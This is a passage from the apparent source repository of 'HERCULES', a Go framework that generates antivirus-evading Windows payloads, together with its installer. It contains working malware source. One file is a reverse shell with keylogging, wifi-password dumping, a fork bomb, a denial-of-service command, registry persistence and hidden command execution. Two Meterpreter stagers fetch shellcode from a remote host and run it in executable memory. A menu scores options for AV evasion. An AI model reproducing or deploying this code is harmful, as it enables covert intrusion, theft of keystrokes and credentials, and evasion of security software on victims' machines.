string("mv " + FileName_No_Suffix + ".exe $HOME") 509 | exec.Command("sh", "-c", MovePayload).Run() 510 | 511 | } 512 | 513 | } 514 | 515 | func AskMigrate() { 516 | Red := color.New(color.FgRed) 517 | Warning := Red.Add(color.Bold) 518 | Yellow := color.New(color.FgYellow) 519 | BoldYellow := Yellow.Add(color.Bold) 520 | BoldYellow.Print("\n[?] ") 521 | fmt.Print("Do you want to add migration function to payload (y/n) :") 522 | fmt.Scan(&Ask) 523 | if Ask == "y" || Ask == "Y" { 524 | Warning.Print("\n[!] 
Adding migration will decreases the AV Evasion Score and increase the paylaod size, do you still want to continue (Y/n) :") 525 | fmt.Scan(&Ask) 526 | if Ask == "y" || Ask == "Y"{ 527 | Payload.Migrate = true 528 | Payload.Score = (Payload.Score - 1) 529 | }else{ 530 | Payload.Migrate = false 531 | } 532 | }else{ 533 | Payload.Migrate = false 534 | } 535 | } 536 | 537 | 538 | 539 | 540 | func AskPersistence() { 541 | Red := color.New(color.FgRed) 542 | Warning := Red.Add(color.Bold) 543 | Yellow := color.New(color.FgYellow) 544 | BoldYellow := Yellow.Add(color.Bold) 545 | BoldYellow.Print("\n[?] ") 546 | fmt.Print("Do you want to add persistence function to payload (y/n) :") 547 | fmt.Scan(&Ask) 548 | if Ask == "y" || Ask == "Y" { 549 | Warning.Print("\n[!] Adding persistence will decreases the AV Evasion Score and increase the paylaod size, do you still want to continue (Y/n) :") 550 | fmt.Scan(&Ask) 551 | if Ask == "y" || Ask == "Y"{ 552 | Payload.Persistence = true 553 | Payload.Score = (Payload.Score - 2) 554 | }else{ 555 | Payload.Persistence = false 556 | } 557 | }else{ 558 | Payload.Persistence = false 559 | } 560 | } 561 | 562 | func AskBypassAV() { 563 | Red := color.New(color.FgRed) 564 | Warning := Red.Add(color.Bold) 565 | Yellow := color.New(color.FgYellow) 566 | BoldYellow := Yellow.Add(color.Bold) 567 | BoldYellow.Print("\n[?] ") 568 | fmt.Print("Do you want to add Bypass AV function to payload (y/n) :") 569 | fmt.Scan(&Ask) 570 | if Ask == "y" || Ask == "Y" { 571 | Warning.Print("\n[!] 
Adding Bypass AV will increase the paylaod size, do you still want to continue (Y/n) :") 572 | fmt.Scan(&Ask) 573 | if Ask == "y" || Ask == "Y"{ 574 | Payload.BypassAV = true 575 | Payload.Score = (Payload.Score + 2) 576 | }else{ 577 | Payload.BypassAV = false 578 | } 579 | }else{ 580 | Payload.BypassAV = false 581 | } 582 | } 583 | 584 | 585 | 586 | 587 | func AskUPX() { 588 | Red := color.New(color.FgRed) 589 | Warning := Red.Add(color.Bold) 590 | Yellow := color.New(color.FgYellow) 591 | BoldYellow := Yellow.Add(color.Bold) 592 | BoldYellow.Print("\n[?] ") 593 | fmt.Print("Do you want to compress the payload with UPX (y/n) :") 594 | fmt.Scan(&Ask) 595 | if Ask == "y" || Ask == "Y" { 596 | Warning.Print("\n[!] Compressing payloads with UPX decreases the AV Evasion Score, do you still want to continue (Y/n) :") 597 | fmt.Scan(&Ask) 598 | if Ask == "y" || Ask == "Y"{ 599 | Payload.UPX = true 600 | Payload.Score = (Payload.Score - 3) 601 | ClearScreen() 602 | PrintBanner() 603 | 604 | ExeName := strings.TrimSuffix(Payload.FileName, ".go") 605 | ExeName += ".exe" 606 | UPX_Command := string("upx --brute " + ExeName) 607 | UPX := exec.Command("sh", "-c", UPX_Command) 608 | UPX.Stdout = os.Stdout 609 | UPX.Run() 610 | }else{ 611 | Payload.UPX = false 612 | } 613 | }else{ 614 | Payload.UPX = false 615 | } 616 | } 617 | 618 | 619 | func ClearScreen() { 620 | Clear := exec.Command("clear") 621 | Clear.Stdout = os.Stdout 622 | Clear.Run() 623 | } 624 | 625 | 626 | 627 | 628 | 629 | 630 | 631 | func PreparePayload(No int) { 632 | 633 | Blue := color.New(color.FgBlue) 634 | BoldBlue := Blue.Add(color.Bold) 635 | Green := color.New(color.FgGreen) 636 | BoldGreen := Green.Add(color.Bold) 637 | Red := color.New(color.FgRed) 638 | Warning := Red.Add(color.Bold) 639 | 640 | 641 | if No == 1 { 642 | Payload.Type = 1 643 | Payload.Size = "946 KB" 644 | Payload.FullSize = "1.1 MB" 645 | Payload.MidSize = "326 KB" 646 | Payload.UPX_Size = "262 KB" 647 | Payload.Score = 8 648 | 
Payload.SourceCode = METERPRETER_TCP 649 | 650 | ClearScreen() 651 | PrintBanner() 652 | 653 | BoldBlue.Println("#====================================================================================#") 654 | BoldBlue.Println("# SELECTED PAYLOAD | SIZE/UPX | AV Evasion Score #") 655 | BoldBlue.Println("#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~#") 656 | BoldBlue.Print("# Meterpreter Reverse TCP | 946 KB / 262 KB | ") 657 | BoldGreen.Print(" 8/10 ") 658 | BoldBlue.Println("#") 659 | BoldBlue.Println("#====================================================================================#") 660 | 661 | for ;; { 662 | var IP string 663 | fmt.Print("\n\n[*] Enter LHOST : ") 664 | fmt.Scan(&IP) 665 | if (len(IP) < 7) || (len(IP) > 15) { 666 | Warning.Println("\n\n[!] ERROR : Invalid ip") 667 | }else{ 668 | Payload.Ip = IP 669 | break 670 | } 671 | 672 | } 673 | 674 | for ;; { 675 | var PORT string 676 | fmt.Print("\n[*] Enter LPORT : ") 677 | fmt.Scan(&PORT) 678 | _, err := strconv.Atoi(PORT) 679 | if err == nil { 680 | Payload.Port = PORT 681 | break 682 | } 683 | Warning.Println("\n\n[!] 
ERROR : Invalid port") 684 | 685 | } 686 | AskPersistence() 687 | AskMigrate() 688 | AskBypassAV() 689 | 690 | 691 | }else if No == 2 { 692 | 693 | Payload.Type = 2 694 | Payload.Size = "4.2 MB" 695 | Payload.UPX_Size = "1.1 KB" 696 | Payload.Score = 8 697 | Payload.SourceCode = METERPRETER_HTTP_HTTPS 698 | 699 | ClearScreen() 700 | PrintBanner() 701 | 702 | BoldBlue.Println("#====================================================================================#") 703 | BoldBlue.Println("# SELECTED PAYLOAD | SIZE/UPX | AV Evasion Score #") 704 | BoldBlue.Println("#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~#") 705 | BoldBlue.Print("# Meterpreter Reverse HTTP | 4.2 MB / 1.1 MB | ") 706 | BoldGreen.Print(" 8/10 ") 707 | BoldBlue.Println("#") 708 | BoldBlue.Println("#====================================================================================#") 709 | 710 | for ;; { 711 | var IP string 712 | fmt.Print("\n\n[*] Enter LHOST : ") 713 | fmt.Scan(&IP) 714 | if (len(IP) < 7) || (len(IP) > 15) { 715 | Warning.Println("\n\n[!] ERROR : Invalid ip") 716 | }else{ 717 | Payload.Ip = IP 718 | break 719 | } 720 | 721 | } 722 | 723 | for ;; { 724 | var PORT string 725 | fmt.Print("\n[*] Enter LPORT : ") 726 | fmt.Scan(&PORT) 727 | _, err := strconv.Atoi(PORT) 728 | if err == nil { 729 | Payload.Port = PORT 730 | break 731 | } 732 | Warning.Println("\n\n[!] 
ERROR : Invalid port") 733 | 734 | } 735 | 736 | 737 | AskPersistence() 738 | AskMigrate() 739 | 740 | 741 | }else if No == 3 { 742 | Payload.Type = 3 743 | Payload.Size = "4.2 MB" 744 | Payload.Score = 8 745 | Payload.SourceCode = METERPRETER_HTTP_HTTPS 746 | 747 | ClearScreen() 748 | PrintBanner() 749 | 750 | BoldBlue.Println("#====================================================================================#") 751 | BoldBlue.Println("# SELECTED PAYLOAD | SIZE/UPX | AV Evasion Score #") 752 | BoldBlue.Println("#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~#") 753 | BoldBlue.Print("# Meterpreter Reverse HTTPS | 4.2 MB / 1.1 MB | ") 754 | BoldGreen.Print(" 8/10 ") 755 | BoldBlue.Println("#") 756 | BoldBlue.Println("#====================================================================================#") 757 | 758 | for ;; { 759 | var IP string 760 | fmt.Print("\n\n[*] Enter LHOST : ") 761 | fmt.Scan(&IP) 762 | if (len(IP) < 7) || (len(IP) > 15) { 763 | Warning.Println("\n\n[!] ERROR : Invalid ip") 764 | }else{ 765 | Payload.Ip = IP 766 | break 767 | } 768 | 769 | } 770 | 771 | for ;; { 772 | var PORT string 773 | fmt.Print("\n[*] Enter LPORT : ") 774 | fmt.Scan(&PORT) 775 | _, err := strconv.Atoi(PORT) 776 | if err == nil { 777 | Payload.Port = PORT 778 | break 779 | } 780 | Warning.Println("\n\n[!] 
ERROR : Invalid port") 781 | 782 | } 783 | 784 | AskPersistence() 785 | AskMigrate() 786 | 787 | 788 | 789 | }else if No == 4 { 790 | Payload.Type = 4 791 | Payload.Size = "4.4 MB" 792 | Payload.Score = 9 793 | Payload.SourceCode = HERCULES_REVERSE_SHELL 794 | 795 | ClearScreen() 796 | PrintBanner() 797 | 798 | BoldBlue.Println("#====================================================================================#") 799 | BoldBlue.Println("# SELECTED PAYLOAD | SIZE/UPX | AV Evasion Score #") 800 | BoldBlue.Println("#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~#") 801 | BoldBlue.Print("# HERCULES REVERSE SHELL | 4.4 MB / 1.1 MB | ") 802 | BoldGreen.Print("7/10 ") 803 | BoldBlue.Println("#") 804 | BoldBlue.Println("#====================================================================================#") 805 | 806 | for ;; { 807 | var IP string 808 | fmt.Print("\n\n[*] Enter LHOST : ") 809 | fmt.Scan(&IP) 810 | if (len(IP) < 7) || (len(IP) > 15) { 811 | Warning.Println("\n\n[!] ERROR : Invalid ip") 812 | }else{ 813 | Payload.Ip = IP 814 | break 815 | } 816 | 817 | } 818 | 819 | for ;; { 820 | var PORT string 821 | fmt.Print("\n[*] Enter LPORT : ") 822 | fmt.Scan(&PORT) 823 | _, err := strconv.Atoi(PORT) 824 | if err == nil { 825 | Payload.Port = PORT 826 | break 827 | } 828 | Warning.Println("\n\n[!] ERROR : Invalid port") 829 | 830 | } 831 | 832 | 833 | 834 | }else { 835 | 836 | ClearScreen() 837 | PrintBanner() 838 | PrintPayloads() 839 | 840 | Warning.Println("\n[!] 
ERROR : Invalid choise\n") 841 | 842 | fmt.Print("\n\n[*] Select : ") 843 | fmt.Scan(&NO) 844 | 845 | PreparePayload(NO) 846 | 847 | } 848 | 849 | } 850 | -------------------------------------------------------------------------------- /SOURCE/Payloads/HERCULES REVERSE SHELL.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import "net" 4 | import "os/exec" 5 | import "bufio" 6 | import "strings" 7 | import "syscall" 8 | import "time" 9 | import "EGESPLOIT" 10 | 11 | 12 | 13 | const IP string = "10.10.10.84" 14 | const PORT string = "5555" 15 | 16 | const BACKDOOR bool = false; 17 | const EMBEDDED bool = false; 18 | const TIME_DELAY time.Duration = 5;//Second 19 | 20 | const B64_BINARY string = "//INSERT-BINARY-HERE//" 21 | const BINARY_NAME string = "winupdt.exe" 22 | 23 | var GLOBAL_COMMAND string; 24 | var PARAMETERS string; 25 | var KeyLogs string; 26 | 27 | 28 | 29 | func main() { 30 | 31 | 32 | if EMBEDDED == true { 33 | EGESPLOIT.Dispatch(B64_BINARY, BINARY_NAME, PARAMETERS) 34 | } 35 | 36 | 37 | if BACKDOOR == true { 38 | EGESPLOIT.Persistence() 39 | } 40 | 41 | connect, err := net.Dial("tcp", IP+":"+PORT); 42 | if err != nil { 43 | time.Sleep(TIME_DELAY*time.Second); 44 | main(); 45 | }; 46 | 47 | 48 | 49 | Dir, Version, Username, AV := EGESPLOIT.Sysguide() 50 | SysGuide := (BANNER + "# SYSGUIDE\n" + "|" + string(Version) + "|\n|\n~> User : " + string(Username) + "\n|\n|\n~> AV : " + string(AV) + "\n\n\n" + string(Dir) + ">") 51 | connect.Write([]byte(string(SysGuide))); 52 | 53 | 54 | 55 | for { 56 | 57 | Command, _ := bufio.NewReader(connect).ReadString('\n'); 58 | _Command := string(Command); 59 | GLOBAL_COMMAND = _Command; 60 | 61 | 62 | 63 | if strings.Contains(_Command, "~please") || strings.Contains(_Command, "~PLEASE") { 64 | connect.Write([]byte(EGESPLOIT.Please(GLOBAL_COMMAND))); 65 | }else if strings.Contains(_Command, "~METERPRETER") || strings.Contains(_Command, "~meterpreter") { 66 | 
Temp_Address := strings.Split(_Command, "\"")//~meterpreter --tcp "127.0.0.1:4444" 67 | Address := string(Temp_Address[1]) 68 | ConType := strings.Split(_Command, " ") 69 | ConType[1] = strings.TrimPrefix(ConType[1], "--") 70 | EGESPLOIT.Meterpreter(ConType[1], Address) 71 | connect.Write([]byte("\n\n[+] Meterpreter Executed !\n\n"+Dir+">")); 72 | }else if strings.Contains(_Command, "~MIGRATE") || strings.Contains(_Command, "~migrate") { 73 | Temp_Address := strings.Split(_Command, "\"")//~migrate "127.0.0.1:4444" 1212 74 | Address := string(Temp_Address[1]) 75 | Pid := strings.Split(_Command, " ") 76 | Result, Error := EGESPLOIT.Migrate(Pid[2], Address) 77 | if Result == true { 78 | connect.Write([]byte("\n\n[+] Succesfully Migrated !\n\n"+Dir+">")); 79 | }else{ 80 | connect.Write([]byte("\n\n"+Error+"\n\n"+Dir+">")); 81 | } 82 | }else if strings.Contains(_Command, "~DOS") || strings.Contains(_Command, "~dos") { 83 | DOS_Command := strings.Split(GLOBAL_COMMAND, "\"") 84 | var DOS_Target string = DOS_Command[1] 85 | if strings.Contains(string(DOS_Target), "http") { 86 | go EGESPLOIT.Dos(DOS_Target); 87 | connect.Write([]byte("\n\n[*] Starting DOS atack..."+"\n\n[*] Sending 1000 request to "+DOS_Target+" !\n\n"+Dir+">")); 88 | }else{ 89 | connect.Write([]byte("\n\n[-] ERROR: Invalid url !\n\n"+Dir+">")); 90 | } 91 | }else if strings.Contains(_Command, "~DISTRACT") || strings.Contains(_Command, "~distract") { 92 | EGESPLOIT.Distrackt(); 93 | }else if strings.Contains(_Command, "~KEYLOGGER-DEPLOY") || strings.Contains(_Command, "~keylogger-deploy") || strings.Contains(_Command, "~Keylogger-Deploy"){ 94 | go EGESPLOIT.Keylogger(&KeyLogs); 95 | connect.Write([]byte(string("\n[*] Keylogger deploy completed\n" + "\n" + string(Dir) + ">"))); 96 | }else if strings.Contains(_Command, "~KEYLOGGER-DUMP") || strings.Contains(_Command, "~keylogger-dump") || strings.Contains(_Command, "~Keylogger-Dump"){ 97 | Dump_Output := string("################## KEYLOGGER DUMP 
##################" + "\n\n" + string(KeyLogs) + "\n####################################################" + "\n"+string(Dir)+">"); 98 | connect.Write([]byte(Dump_Output)); 99 | }else if strings.Contains(_Command, "~WIFI-LIST") || strings.Contains(_Command, "~wifi-list") { 100 | List := EGESPLOIT.WifiList(); 101 | connect.Write([]byte(string(List))); 102 | }else if strings.Contains(_Command, "~HELP") || strings.Contains(_Command, "~help") { 103 | connect.Write([]byte(string(HELP+Dir+">"))); 104 | }else if strings.Contains(_Command, "~PERSISTENCE") || strings.Contains(_Command, "~persistence") { 105 | go EGESPLOIT.Persistence(); 106 | connect.Write([]byte("\n\n[*] Adding persistence registries...\n[*] Persistence Completed\n\n" + string(Dir) +">")); 107 | }else{ 108 | cmd := exec.Command("cmd", "/C", _Command); 109 | cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}; 110 | out, _ := cmd.Output(); 111 | Command_Output := string("\n\n"+string(out)+"\n"+string(Dir)+">"); 112 | connect.Write([]byte(Command_Output)); 113 | }; 114 | }; 115 | }; 116 | 117 | 118 | 119 | 120 | 121 | 122 | var BANNER string = ` 123 | __ ____________ ________ ____ ___________ 124 | / / / / ____/ __ \/ ____/ / / / / / ____/ ___/ 125 | / /_/ / __/ / /_/ / / / / / / / / __/ \__ \ 126 | / __ / /___/ _, _/ /___/ /_/ / /___/ /___ ___/ / 127 | /_/ /_/_____/_/ |_|\____/\____/_____/_____//____/ 128 | 129 | 130 | ############################ HERCULES REVERSE SHELL ############################ 131 | ` 132 | 133 | 134 | 135 | 136 | var HELP string = ` 137 | 138 | __ ____________ ________ ____ ___________ 139 | / / / / ____/ __ \/ ____/ / / / / / ____/ ___/ 140 | / /_/ / __/ / /_/ / / / / / / / / __/ \__ \ 141 | / __ / /___/ _, _/ /___/ /_/ / /___/ /___ ___/ / 142 | /_/ /_/_____/_/ |_|\____/\____/_____/_____//____/ 143 | 144 | 145 | ############################ HERCULES REVERSE SHELL ########################################## 146 | 147 | 148 | 149 | ~PERSSISTENCE Installs a persistence module for 
continious acces 150 | 151 | ~DISTRACT Executes a fork bomb bat file for distraction 152 | 153 | ~PLEASE Asks users comfirmation for higher privilidge operations 154 | 155 | ~DOS -A "www.targetsite.com" Starts a denial of service atack 156 | 157 | ~WIFI-LIST Dumps all wifi history data with passwords 158 | 159 | ~METERPRETER --http "10.0.0.1:4444" Creates a meterpreter connection to metasploit (http/https/tcp) 160 | 161 | ~KEYLOGGER-DEPLOY Installs a keylogger module and logs all keystrokes 162 | 163 | ~KEYLOGGER-DUMP Dumps all loged keystrokes 164 | 165 | ~MIGRATE "10.0.0.1:4444" 2222 Creates a reverse http meterpreter session at given pid (EXPERIMENTAL) 166 | 167 | 168 | ############################################################################################### 169 | 170 | ` 171 | -------------------------------------------------------------------------------- /SOURCE/Payloads/Meterpreter_Reverse_HTTP_HTTPS.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import "net/http" 4 | import "syscall" 5 | import "unsafe" 6 | import "io/ioutil" 7 | //import "EGESPLOIT/RSE" 8 | 9 | 10 | 11 | const MEM_COMMIT = 0x1000 12 | const MEM_RESERVE = 0x2000 13 | const PAGE_AllocateUTE_READWRITE = 0x40 14 | 15 | var K32 = syscall.NewLazyDLL("kernel32.dll") 16 | var VirtualAlloc = K32.NewProc("VirtualAlloc") 17 | var Address string = "http://127.0.0.1:8080/" 18 | var Checksum string = "102011b7txpl71n" 19 | 20 | 21 | 22 | func main() { 23 | //RSE.Persistence() 24 | Address += Checksum 25 | Response, err := http.Get(Address) 26 | if err != nil { 27 | main() 28 | } 29 | Shellcode, _ := ioutil.ReadAll(Response.Body) 30 | 31 | Addr, _, err := VirtualAlloc.Call(0, uintptr(len(Shellcode)), MEM_RESERVE|MEM_COMMIT, PAGE_AllocateUTE_READWRITE) 32 | if Addr == 0 { 33 | main() 34 | } 35 | AddrPtr := (*[990000]byte)(unsafe.Pointer(Addr)) 36 | for i := 0; i < len(Shellcode); i++ { 37 | AddrPtr[i] = Shellcode[i] 38 | } 39 | 
//RSE.Migrate(Addr, len(Shellcode)) 40 | syscall.Syscall(Addr, 0, 0, 0, 0) 41 | 42 | } 43 | -------------------------------------------------------------------------------- /SOURCE/Payloads/Meterpreter_Reverse_TCP.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | 4 | import "encoding/binary" 5 | import "syscall" 6 | import "unsafe" 7 | //import "EGESPLOIT/RSE" 8 | 9 | const MEM_COMMIT = 0x1000 10 | const MEM_RESERVE = 0x2000 11 | const PAGE_AllocateUTE_READWRITE = 0x40 12 | 13 | 14 | var K32 = syscall.NewLazyDLL("kernel32.dll") 15 | var VirtualAlloc = K32.NewProc("VirtualAlloc") 16 | 17 | 18 | func Allocate(Shellcode uintptr) (uintptr) { 19 | 20 | Addr, _, _ := VirtualAlloc.Call(0, Shellcode, MEM_RESERVE|MEM_COMMIT, PAGE_AllocateUTE_READWRITE) 21 | if Addr == 0 { 22 | main() 23 | } 24 | return Addr 25 | } 26 | 27 | func main() { 28 | //RSE.Persistence() 29 | var WSA_Data syscall.WSAData 30 | syscall.WSAStartup(uint32(0x202), &WSA_Data) 31 | Socket, _ := syscall.Socket(syscall.AF_INET, syscall.SOCK_STREAM, 0) 32 | Socket_Addr := syscall.SockaddrInet4{Port: 5555, Addr: [4]byte{127,0,0,1}} 33 | syscall.Connect(Socket, &Socket_Addr) 34 | var Length [4]byte 35 | WSA_Buffer := syscall.WSABuf{Len: uint32(4), Buf: &Length[0]} 36 | UitnZero_1 := uint32(0) 37 | DataReceived := uint32(0) 38 | syscall.WSARecv(Socket, &WSA_Buffer, 1, &DataReceived, &UitnZero_1, nil, nil) 39 | Length_int := binary.LittleEndian.Uint32(Length[:]) 40 | if Length_int < 100 { 41 | main() 42 | } 43 | Shellcode_Buffer := make([]byte, Length_int) 44 | 45 | var Shellcode []byte 46 | WSA_Buffer = syscall.WSABuf{Len: Length_int, Buf: &Shellcode_Buffer[0]} 47 | UitnZero_1 = uint32(0) 48 | DataReceived = uint32(0) 49 | TotalDataReceived := uint32(0) 50 | for TotalDataReceived < Length_int { 51 | syscall.WSARecv(Socket, &WSA_Buffer, 1, &DataReceived, &UitnZero_1, nil, nil) 52 | for i := 0; i < int(DataReceived); i++ { 53 | Shellcode = 
append(Shellcode, Shellcode_Buffer[i]) 54 | } 55 | TotalDataReceived += DataReceived 56 | } 57 | 58 | Addr := Allocate(uintptr(Length_int + 5)) 59 | AddrPtr := (*[990000]byte)(unsafe.Pointer(Addr)) 60 | SocketPtr := (uintptr)(unsafe.Pointer(Socket)) 61 | AddrPtr[0] = 0xBF 62 | AddrPtr[1] = byte(SocketPtr) 63 | AddrPtr[2] = 0x00 64 | AddrPtr[3] = 0x00 65 | AddrPtr[4] = 0x00 66 | for BpuAKrJxfl, IIngacMaBh := range Shellcode { 67 | AddrPtr[BpuAKrJxfl+5] = IIngacMaBh 68 | } 69 | //RSE.Migrate(Addr, int(Length_int)) 70 | syscall.Syscall(Addr, 0, 0, 0, 0) 71 | } 72 | 73 | /* 74 | 75 | 1. Create WSA DATA version 2.2 76 | 2. Create a WSA Socket 77 | 3. Create WSA Socket Address object 78 | 4. Connect 79 | 5. Create 4 byte second stage length array 80 | 6. Create a WSA Buffer object pointing second stage length array 81 | 7. Receive 4 bytes WSARecv to second stage length array 82 | 8. Convert second stage length to int 83 | 9. Create a byte array at the size of second stage byte array for second stage shellcode 84 | 10. Create a undefined byte array 85 | 11. Create another WSA buffer object pointing at second stage shellcode byte array 86 | 12. Construct a nested for loop that receives bytes and appends them into undefined byte array 87 | 13. Allocate space in memory at the size of (second stage shellcode + 5) 88 | 14. Create a pointer that points to WSA Socket 89 | 15. Assing 0xBF(mov edi) to fist byte of allocated memory 90 | 16. Assing WSA Socket pointer to second byte of allocated memory 91 | 17. Assing tree null bytes after second byte of allocated memory 92 | 18. Move shellcode bytes to allocated memory starting at fift byte 93 | 19. 
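Make a syscall to allocated memory address
*/
--------------------------------------------------------------------------------
/Setup.go:
--------------------------------------------------------------------------------
package main

import "os/exec"
import "strings"
import "runtime"
import "github.com/fatih/color"
import "os"

// herculesBinPath is where the HERCULES launcher script is installed so that
// it is on every user's PATH; CheckValid looks for it at the same location.
const herculesBinPath = "/bin/HERCULES"

// main runs the interactive HERCULES installer: it detects the Linux
// distribution, records HERCULES_PATH, installs golang/upx/git with the
// distribution's package manager, fetches the EGESPLOIT and color libraries
// into a GOPATH rooted at the repository, builds SOURCE/HERCULES.go and
// installs the launcher script. Every step that previously went through
// `sh -c` now execs the program directly, so no path or user-controlled
// string is ever re-parsed by a shell.
func main() {

	Green := color.New(color.FgGreen)
	BoldGreen := Green.Add(color.Bold)
	Yellow := color.New(color.FgYellow)
	BoldYellow := Yellow.Add(color.Bold)
	Red := color.New(color.FgRed)
	BoldRed := Red.Add(color.Bold)
	White := color.New(color.FgWhite)
	BoldWhite := White.Add(color.Bold)

	color.Red(" ██░ ██ ▓█████ ██▀███ ▄████▄ █ ██ ██▓ ▓█████ ██████ ")
	color.Red("▓██░ ██▒▓█ ▀ ▓██ ▒ ██▒▒██▀ ▀█ ██ ▓██▒▓██▒ ▓█ ▀ ▒██ ▒ ")
	color.Red("▒██▀▀██░▒███ ▓██ ░▄█ ▒▒▓█ ▄ ▓██ ▒██░▒██░ ▒███ ░ ▓██▄ ")
	color.Red("░▓█ ░██ ▒▓█ ▄ ▒██▀▀█▄ ▒▓▓▄ ▄██▒▓▓█ ░██░▒██░ ▒▓█ ▄ ▒ ██▒")
	color.Red("░▓█▒░██▓░▒████▒░██▓ ▒██▒▒ ▓███▀ ░▒▒█████▓ ░██████▒░▒████▒▒██████▒▒")
	color.Red(" ▒ ░░▒░▒░░ ▒░ ░░ ▒▓ ░▒▓░░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ░ ▒░▓ ░░░ ▒░ ░▒ ▒▓▒ ▒ ░")
	color.Red(" ▒ ░▒░ ░ ░ ░ ░ ░▒ ░ ▒░ ░ ▒ ░░▒░ ░ ░ ░ ░ ▒ ░ ░ ░ ░░ ░▒ ░ ░")
	color.Red(" ░ ░░ ░ ░ ░░ ░ ░ ░░░ ░ ░ ░ ░ ░ ░ ░ ░ ")
	color.Red(" ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ")
	color.Red(" ░ ")

	color.Green("\n+ -- --=[ HERCULES FRAMEWORK ]")
	BoldGreen.Println("+ -- --=[ Ege Balcı ]")

	Priv := CheckSUDO()

	BoldWhite.Println("\n\n[*] STARTING HERCULES SETUP \n")

	BoldYellow.Println("[*] Detecting OS...")

	// The original `if linux {...} else if != linux {...}` is a plain guard.
	if runtime.GOOS != "linux" {
		BoldRed.Println("[!] ERROR : HERCULES only supports linux distributions")
		return
	}

	OsVersion, _ := exec.Command("uname", "-a").Output()
	BoldYellow.Println("[*] OS Detected : " + string(OsVersion))

	// Package-manager invocations per distribution family; label is only
	// used for the progress message.
	type pkg struct {
		label string
		args  []string
	}
	var pkgs []pkg
	switch {
	case strings.Contains(string(OsVersion), "Ubuntu") || strings.Contains(string(OsVersion), "kali"):
		pkgs = []pkg{
			{"golang", []string{"apt-get", "install", "golang"}},
			{"upx", []string{"apt-get", "install", "upx"}},
			{"git", []string{"apt-get", "install", "git"}},
		}
	case strings.Contains(string(OsVersion), "ARCH") || strings.Contains(string(OsVersion), "MANJARO"):
		pkgs = []pkg{
			{"golang", []string{"pacman", "-S", "go"}},
			{"upx", []string{"pacman", "-S", "upx"}},
			{"git", []string{"pacman", "-S", "git"}},
		}
	default:
		BoldRed.Println("[!] ERROR : HERCULES does not support this OS")
		return
	}

	// The original printed this error and carried on; package installation
	// and writing to /bin need root, so stop here instead of half-installing.
	if !Priv {
		BoldRed.Println("[!] ERROR : Setup needs root privileges")
		return
	}

	BoldYellow.Println("[*] Setting HERCULES path...")
	// os.Getwd replaces `sh -c pwd`: no shell and no trailing newline to trim.
	Path, err := os.Getwd()
	if err != nil {
		BoldRed.Println("[!] ERROR : Unable to determine the current directory")
		return
	}
	BoldYellow.Println("[*] HERCULES_PATH=" + Path)
	if err := persistHerculesPath(Path); err != nil {
		BoldRed.Println("[!] ERROR : Unable to write HERCULES_PATH to ~/.bashrc")
	}
	// `sh -c "export ..."` only affected the short-lived child shell; the
	// go get / go build steps below inherit this process's environment, so
	// the variables have to be set here to have any effect.
	os.Setenv("HERCULES_PATH", Path)
	os.Setenv("GOPATH", Path)

	for _, p := range pkgs {
		BoldYellow.Println("[*] Installing " + p.label + "...")
		if err := runIn("", p.args[0], p.args[1:]...); err != nil {
			BoldRed.Println("[!] ERROR : Unable to install " + p.label)
			return
		}
	}

	// GOPATH is the repository root, so importable sources belong under
	// <root>/src. The Ubuntu branch cloned there (without creating it); the
	// Arch branch cloned into SOURCE/, which GOPATH never sees. Both now use
	// src, created on demand.
	srcDir := Path + "/src"
	if err := os.MkdirAll(srcDir, 0755); err != nil {
		BoldRed.Println("[!] ERROR : Unable to create " + srcDir)
		return
	}
	BoldYellow.Println("[*] Cloning EGESPLOIT Library...")
	if err := runIn(srcDir, "git", "clone", "https://github.com/EgeBalci/EGESPLOIT.git"); err != nil {
		BoldRed.Println("[!] ERROR : Unable to clone EGESPLOIT")
	}
	BoldYellow.Println("[*] Cloning color Library...")
	if err := runIn(Path, "go", "get", "github.com/fatih/color"); err != nil {
		BoldRed.Println("[!] ERROR : Unable to fetch github.com/fatih/color")
	}
	if err := runIn(Path+"/SOURCE", "go", "build", "HERCULES.go"); err != nil {
		BoldRed.Println("[!] ERROR : Unable to build SOURCE/HERCULES.go")
	}

	BoldYellow.Println("[*] Createing shoutcut...")
	if err := runIn(Path, "cp", "HERCULES", herculesBinPath); err != nil {
		BoldRed.Println("[!] ERROR : Unable to copy the launcher to " + herculesBinPath)
	}
	// 0755, not 0777: a world-writable file in /bin lets any local user
	// replace a script that root will later execute.
	if err := os.Chmod(herculesBinPath, 0755); err != nil {
		BoldRed.Println("[!] ERROR : Unable to set permissions on " + herculesBinPath)
	}

	Stat, Err := CheckValid()
	if !Stat {
		BoldYellow.Println("\n")
		BoldRed.Println(Err)
		return
	}
	BoldGreen.Println("\n\n[+] Setup completed successfully")
	// Kept from the original, presumably so a fresh shell picks up the new
	// ~/.bashrc export; the `sh -c exit` that followed it did nothing.
	exec.Command("gnome-terminal").Run()
}

// runIn executes name with args in dir (the current directory when dir is
// empty), wiring the child to this process's stdin/stdout/stderr so package
// managers can prompt. The program is exec'd directly — no shell — so the
// arguments are never re-parsed. Returns the child's exit error, if any.
func runIn(dir string, name string, args ...string) error {
	cmd := exec.Command(name, args...)
	cmd.Dir = dir
	cmd.Stdin = os.Stdin
	cmd.Stdout = os.Stdout
	cmd.Stderr = os.Stderr
	return cmd.Run()
}

// persistHerculesPath appends `export HERCULES_PATH='<path>'` to $HOME/.bashrc.
// The original did this through `sh -c "echo '...' >> ~/.bashrc"` with the
// path spliced into the command line, so a directory name containing a quote
// would break out of the echo; writing the file directly and single-quoting
// the value keeps the path inert. Under sudo, $HOME is normally root's home,
// which matches the original `~`. Returns any error from locating or
// writing the file.
func persistHerculesPath(path string) error {
	home := os.Getenv("HOME")
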